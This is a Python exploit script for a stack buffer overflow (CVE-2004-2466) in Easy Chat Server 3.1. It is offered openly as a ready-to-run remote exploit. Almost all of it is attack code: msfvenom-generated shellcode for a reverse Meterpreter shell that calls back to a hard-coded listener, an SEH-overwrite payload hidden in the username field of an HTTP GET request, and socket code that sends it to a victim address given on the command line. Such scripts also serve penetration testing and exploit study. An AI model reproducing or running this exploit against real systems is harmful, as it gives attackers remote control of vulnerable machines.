Easy Chat Server 3.1 Buffer Overflow

`#!/usr/bin/python  
# Easy Chat Server 3.1 Remote Exploit  
# Written by r00tpgp @ http://www.r00tpgp.com  
# Usage: python easychat-exploit.py <victim-ip> <port>  
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990  
# CVE: CVE-2004-2466  
# Installer: http://www.echatserver.com/  
# Tested on Windows 7 32b SP1  
  
import sys, socket, time  
  
host = sys.argv[1] # Recieve IP from user  
port = int(sys.argv[2]) # Recieve Port from user  
  
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990  
-f python -b "\x00\x20"  
buf = ""  
buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"  
buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"  
buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"  
buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"  
buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"  
buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"  
buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"  
buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"  
buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"  
buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"  
buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"  
buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"  
buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"  
buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"  
buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"  
buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"  
buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"  
buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"  
buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"  
buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"  
buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"  
buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"  
buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"  
buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"  
buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"  
buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"  
buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"  
buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"  
  
junk = "A"*217  
nseh = "\xeb\x06\x90\x90" # short jump 6 bytes  
seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL  
nops = "\x90"*16  
  
header = (  
"GET /chat.ghp?username=" + junk + nseh + seh + nops + buf +  
"&password=&room=1&sex=1 HTTP/1.1\r\n"  
"User-Agent: Mozilla/4.0\r\n"  
"Host: 192.168.1.136:80\r\n"  
"Accept-Language: en-us\r\n"  
"Accept-Encoding: gzip, deflate\r\n"  
"Referer: http://192.168.1.136\r\n"  
"Connection: Keep-Alive\r\n\r\n"  
)  
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP  
socket  
client.connect((host, port)) # Connect to user supplied port and IP address  
client.send(header) # Send the user command with a variable length name  
client.close() # Close the Connection  
`